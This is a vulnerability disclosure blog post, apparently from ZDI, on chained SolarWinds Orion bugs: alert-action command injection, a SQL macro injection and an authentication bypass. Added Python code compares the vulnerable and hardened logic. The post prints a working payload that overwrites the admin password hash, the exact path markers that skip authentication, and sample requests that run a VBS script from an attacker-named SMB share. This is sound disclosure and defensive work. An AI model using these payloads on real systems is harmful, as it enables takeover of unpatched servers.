Three Bugs in Orion’s Belt: Chaining Multiple bugs for Unauthenticated RCE in the SolarWinds Orion Platform

January 21, 2021 | Guest User

This blog post details several recently patched vulnerabilities in the SolarWinds Orion Platform. Chained together, these bugs allow an unauthenticated attacker to execute arbitrary code as Administrator on an affected system. One of them, CVE-2020-14005, has been linked to the recent SUNBURST attack on SolarWinds, although the exact details of how, or whether, this particular bug was used in the wild remain unclear.

In addition to details of vulnerabilities acquired by ZDI, this blog also contains research from our N-day team about an authentication bypass that allows these bugs to be exploited without authentication. We would like to thank the Trend Micro Security Research team for their efforts in analyzing the technical details of this auth bypass. 

Before we get to the details, here’s a quick video showing how CVE-2020-10148 and CVE-2020-14005 can be used in conjunction to achieve remote code execution as Administrator without authentication.

SolarWinds Account Privileges

SolarWinds users can have any one of the following privileges, some of which are more permissive than others: 

For example, the Alert Management privilege allows a user to modify or create new alerts. An alert is an automated notification that a network event has occurred.

SolarWinds API

Upon installation, the SolarWinds Orion Platform exposes a web-based GUI. The SolarWinds REST API can perform the same actions that are available in this interface, so anything a user can do by clicking through the GUI can also be done by sending the corresponding API request.

The ZDI first learned of this attack surface from an anonymous researcher, who showed that a user holding only the Alert Management privilege (henceforth referred to as a non-admin user) can trigger serious side effects on the SolarWinds Orion Platform through either the web-based GUI or the REST API.

CVE-2020-14005: Command injection and Execution of Arbitrary VBScript

The product allows a non-admin user to specify the path of a VBS script to be executed when an alert is triggered. The path is not restricted to local files: a UNC path to a VBS file on a remote SMB share is accepted, so an attacker can point the action at a script under their control and have the Orion server run it.

The execution of the VBS script is handled by the following method:

During the analysis of this case, we noticed that the interpreter parameter can also be controlled by manipulating the JSON body of the API request. By specifying cmd.exe instead of WScript.exe, the attacker-supplied script argument is handed to the command shell, so the bug can be exploited as a straightforward command injection:

Another feature available to non-admin users allows the execution of external scripts, and it can be exploited in the same fashion:

The specified script is later executed by the following:
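To make the two control points in this section concrete (the script path that may be a UNC path, and the interpreter that may be swapped for cmd.exe), here is an added model of an alert-action runner with its hardened counterpart. This is example code written for this post, not SolarWinds code: the JSON field names ("ScriptPath", "Interpreter"), the pinned interpreter path and the allowlisted script directory are assumptions, and nothing is actually executed; the functions only build, or refuse to build, the command line.

```python
"""Added model of the alert-action script runner behind CVE-2020-14005.

Illustrative code, not SolarWinds code: the JSON field names
("ScriptPath", "Interpreter"), the pinned interpreter path and the
allowlisted script directory are assumptions for this example. Nothing is
executed; the functions only build, or refuse to build, the command line.
"""
import json
import ntpath

# Assumed values for the example (hypothetical, not the product's settings).
SCRIPT_ROOT = r"C:\ProgramData\SolarWinds\Scripts"
PINNED_INTERPRETER = r"C:\Windows\System32\wscript.exe"
DEFAULT_INTERPRETER = "WScript.exe"   # the interpreter the post names


class ActionRejected(ValueError):
    """Raised by the hardened builder when an action definition is refused."""


def build_command_vulnerable(body: str) -> list:
    """Model of the original behaviour: script path *and* interpreter are taken
    straight from the request body, so a UNC path to an attacker-controlled
    share is accepted and the interpreter can be swapped for cmd.exe."""
    action = json.loads(body)
    interpreter = action.get("Interpreter", DEFAULT_INTERPRETER)
    return [interpreter, action["ScriptPath"]]


def build_command_fixed(body: str) -> list:
    """Hardened builder: the interpreter is pinned, any attempt to override it
    is refused, and the script must be a .vbs file inside SCRIPT_ROOT.
    ntpath is used so the checks behave like Windows path handling on any host."""
    action = json.loads(body)
    if "Interpreter" in action:
        raise ActionRejected("interpreter is not user-selectable")
    raw = str(action.get("ScriptPath", ""))
    path = ntpath.normpath(raw)              # collapses '..' and mixed slashes
    if path.startswith("\\\\"):              # \\server\share or //server/share
        raise ActionRejected("UNC paths are not allowed")
    if not ntpath.isabs(path):
        raise ActionRejected("script path must be absolute")
    root = ntpath.normcase(SCRIPT_ROOT) + "\\"
    if not ntpath.normcase(path).startswith(root):
        raise ActionRejected("script must live under the allowlisted directory")
    if ntpath.splitext(path)[1].lower() != ".vbs":
        raise ActionRejected("only .vbs scripts are allowed")
    # //B (batch) and //Nologo are standard wscript.exe switches.
    return [PINNED_INTERPRETER, "//B", "//Nologo", path]


def evaluate_fixed(body: str) -> tuple:
    """Convenience wrapper returning (accepted, command_or_reason)."""
    try:
        return True, build_command_fixed(body)
    except ActionRejected as exc:
        return False, str(exc)


# Constructed sample request bodies modelled on the two abuses the post describes,
# plus a traversal attempt and a legitimate action.
SAMPLE_BODIES = {
    "remote_vbs": json.dumps({"ScriptPath": r"\\attacker\share\evil.vbs"}),
    "interpreter_override": json.dumps({"ScriptPath": "/c whoami", "Interpreter": "cmd.exe"}),
    "traversal": json.dumps({"ScriptPath": r"C:\ProgramData\SolarWinds\Scripts\..\..\..\Temp\x.vbs"}),
    "legit": json.dumps({"ScriptPath": r"C:\ProgramData\SolarWinds\Scripts\notify.vbs"}),
}

if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(f"{name:22} vulnerable -> {build_command_vulnerable(body)}")
        print(f"{name:22} fixed      -> {evaluate_fixed(body)}")
```

The point of the hardened builder is that neither value the attacker controls reaches the command line unchecked: the interpreter is never read from the request, and the path is normalised before it is compared against the allowlisted directory, so both the UNC share and the `..` traversal are refused.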

CVE-2020-27869: SQL Injection Privilege Escalation Vulnerability

There is also a SQL injection vulnerability that non-admin users can reach through the Configure Action setting (or the corresponding API command).

These requests are handled by the following code:

As shown, if the "Body to POST" field contains the string "${SQL:", the text that follows it (up to the closing brace) is evaluated as a SQL statement against the Orion database, which is a SQL injection. Because multiple statements can be stacked inside the macro, this allows takeover of the Administrator account: the following string overwrites the admin account's stored password hash and salt with values of the attacker's choosing:

${SQL: SELECT @@version; UPDATE [dbo].[Accounts] SET PasswordHash = 'Yj505tc0oUwHdI1tgBoOtGWvKlGviV7tGGb276YZwyaADa/iyFhg1JHCJF1RwwNfvYiVGXca1AFFJvrIGgNHdQ==' WHERE AccountID = 'admin'; UPDATE [dbo].[Accounts] SET PasswordSalt= '8M4EuLag9Lpl+d9i0GQKDw==' WHERE AccountID = 'admin'}
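The following added example models the macro expansion behind this bug and a hardened design beside it. It is illustrative code written for this post, not SolarWinds code: an in-memory SQLite table stands in for the Orion Accounts table, the macro syntax is the one in the payload above, and the T-SQL specifics (@@version, [dbo].[Accounts]) are replaced by SQLite equivalents so the example runs anywhere.

```python
"""Added model of the ${SQL:...} macro expansion behind CVE-2020-27869.

Illustrative code, not SolarWinds code: an in-memory SQLite table stands in
for the Orion Accounts table, and the macro syntax is the one in the post's
payload. The T-SQL specifics (@@version, [dbo].[Accounts]) are replaced by
SQLite equivalents so the example runs anywhere.
"""
import re
import sqlite3

MACRO = re.compile(r"\$\{SQL:(.*?)\}", re.DOTALL)


def make_db() -> sqlite3.Connection:
    """Constructed sample database: one admin account with placeholder values."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Accounts (AccountID TEXT PRIMARY KEY, "
                "PasswordHash TEXT, PasswordSalt TEXT)")
    con.execute("INSERT INTO Accounts VALUES ('admin', 'ORIGINAL_HASH', 'ORIGINAL_SALT')")
    con.commit()
    return con


def admin_credentials(con) -> tuple:
    """(PasswordHash, PasswordSalt) currently stored for the admin account."""
    return con.execute(
        "SELECT PasswordHash, PasswordSalt FROM Accounts WHERE AccountID = 'admin'").fetchone()


def _run_stacked(sql: str, con) -> str:
    """Executes every ';'-separated statement and returns the first column of
    the last row-returning statement. Splitting on ';' is a simplification
    (it would break on literals containing ';'); it is enough to show that
    the UPDATEs stacked after the SELECT are executed too."""
    result = ""
    for stmt in (s.strip() for s in sql.split(";") if s.strip()):
        cur = con.execute(stmt)
        if cur.description:                  # only SELECT-like statements have columns
            row = cur.fetchone()
            result = "" if row is None else str(row[0])
    con.commit()
    return result


def expand_body_vulnerable(body: str, con) -> str:
    """Flawed expansion: whatever sits between '${SQL:' and '}' in the
    user-supplied POST body is executed verbatim against the database."""
    return MACRO.sub(lambda m: _run_stacked(m.group(1), con), body)


# Hardened design: a macro names a query, it never carries one. Only these
# read-only, parameter-free statements can be referenced from a body.
SAFE_MACROS = {
    "DbVersion": "SELECT sqlite_version()",
}


def expand_body_fixed(body: str, con) -> str:
    """Safe expansion: the macro body is looked up as a name in SAFE_MACROS;
    anything else is rejected before touching the database."""
    def lookup(m):
        name = m.group(1).strip()
        if name not in SAFE_MACROS:
            raise ValueError(f"unknown or disallowed SQL macro: {name!r}")
        row = con.execute(SAFE_MACROS[name]).fetchone()
        return str(row[0])
    return MACRO.sub(lookup, body)


# Constructed payload modelled on the one in the post (hash/salt values are placeholders).
ATTACK_BODY = (
    "alert fired: ${SQL: SELECT sqlite_version(); "
    "UPDATE Accounts SET PasswordHash = 'ATTACKER_HASH' WHERE AccountID = 'admin'; "
    "UPDATE Accounts SET PasswordSalt = 'ATTACKER_SALT' WHERE AccountID = 'admin'}"
)


def demo_vulnerable() -> tuple:
    """Returns (expanded body, admin credentials after expansion)."""
    con = make_db()
    expanded = expand_body_vulnerable(ATTACK_BODY, con)
    return expanded, admin_credentials(con)


def demo_fixed() -> tuple:
    """Returns (rejected, admin credentials after the attempt) for the hardened expander."""
    con = make_db()
    try:
        expand_body_fixed(ATTACK_BODY, con)
        rejected = False
    except ValueError:
        rejected = True
    return rejected, admin_credentials(con)
```

Running demo_vulnerable() shows the body expanding to the database version while the admin row silently changes underneath it; demo_fixed() refuses the same body and leaves the row untouched. The design point is that user-supplied text must never become a statement, only a key into a set of statements the application already owns.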

CVE-2020-10148: Authentication Bypass

While evaluating the patch introduced by Hotfix 2, our N-day team identified another vulnerability that can be used to bypass authentication altogether. This bug was assigned CVE-2020-10148. The application contains logic to skip authentication when the client requests a resource that does not require it, such as JavaScript or Cascading Style Sheets (CSS) files. Specifically, authentication is bypassed if the request URL path contains "Skipi18n" or ends with "i18n.ashx", "WebResource.axd", or "ScriptResource.axd". Because this decision is made on the shape of the path rather than on the resource that is actually served, a request for an otherwise protected handler is let through whenever its path carries one of these markers, which is what allows the bugs above to be reached without credentials.
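The following added example implements the path test exactly as described above and puts a per-resource check next to it. It is illustrative code written for this post, not SolarWinds code: the handler paths in STATIC_RESOURCES and the protected page names are assumptions for the example.

```python
"""Added model of the path check behind CVE-2020-10148.

Illustrative code, not SolarWinds code. The post states that authentication
is skipped when the request path contains "Skipi18n" or ends with
"i18n.ashx", "WebResource.axd" or "ScriptResource.axd"; the vulnerable
function below implements exactly that test. The hardened function decides
per resource instead. The resource paths in STATIC_RESOURCES and the
protected page names are assumptions for the example.
"""
import posixpath
from urllib.parse import urlsplit

BYPASS_SUBSTRING = "Skipi18n"
BYPASS_SUFFIXES = ("i18n.ashx", "WebResource.axd", "ScriptResource.axd")

# Assumed set of genuinely public handlers (hypothetical paths), lower-cased
# because ASP.NET routes are case-insensitive.
STATIC_RESOURCES = frozenset(p.lower() for p in (
    "/Orion/WebResource.axd",
    "/Orion/ScriptResource.axd",
    "/Orion/i18n.ashx",
))


def requires_auth_vulnerable(url: str) -> bool:
    """The flawed rule: a pattern match on the path decides, so any request
    whose path carries one of the markers is treated as public."""
    path = urlsplit(url).path
    if BYPASS_SUBSTRING in path:
        return False
    if path.endswith(BYPASS_SUFFIXES):
        return False
    return True


def requires_auth_fixed(url: str) -> bool:
    """Hardened rule: normalise the path (dot segments, duplicate slashes,
    case) and skip authentication only for an exact match against the
    allowlisted public resources."""
    path = posixpath.normpath(urlsplit(url).path).lower()
    return path not in STATIC_RESOURCES


# Constructed sample requests: a legitimate static fetch, a hypothetical
# protected page, the same page decorated with each bypass marker, and a
# static fetch written with a dot segment.
SAMPLE_URLS = (
    "/Orion/WebResource.axd?d=abc",
    "/Orion/Admin/Protected.aspx",
    "/Orion/Skipi18n/Admin/Protected.aspx",
    "/Orion/Admin/Protected.aspx/WebResource.axd",
    "/Orion/../Orion/ScriptResource.axd",
)


def compare(urls=SAMPLE_URLS) -> dict:
    """Returns {url: (vulnerable_requires_auth, fixed_requires_auth)}."""
    return {u: (requires_auth_vulnerable(u), requires_auth_fixed(u)) for u in urls}


if __name__ == "__main__":
    for url, (vuln, fixed) in compare().items():
        print(f"{url:48} vulnerable={vuln!s:5} fixed={fixed}")
```

The two decorated requests are the instructive rows: the substring and suffix rules wave them through, while the exact-match rule still demands authentication, and normalising the path first keeps a legitimately public resource public even when it is requested with a dot segment.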

While each of these bugs may be less severe on its own, chained together they allow an attacker to gain unauthenticated remote code execution as Administrator. Finding and fixing these types of bugs helps clear the ecosystem of high-impact vulnerabilities, hopefully before an adversary uses them. Applying the fixes from the vendor shores up your defenses and helps prevent unwanted intrusions into your enterprise.

Conclusion

The SolarWinds Orion Platform is a critical piece of infrastructure within an organization. SolarWinds has released patches to address these and other bugs. You should follow this guidance to ensure your system has the latest security updates. We are glad to be able to contribute to the security of this codebase via the ZDI program. Stay tuned for Part 2 of this blog, which will cover vulnerabilities in other components of the SolarWinds Orion Platform with similar effects. 

Until then, you can find me on Twitter at @zebasquared, and follow the team for the latest in exploit techniques and security patches.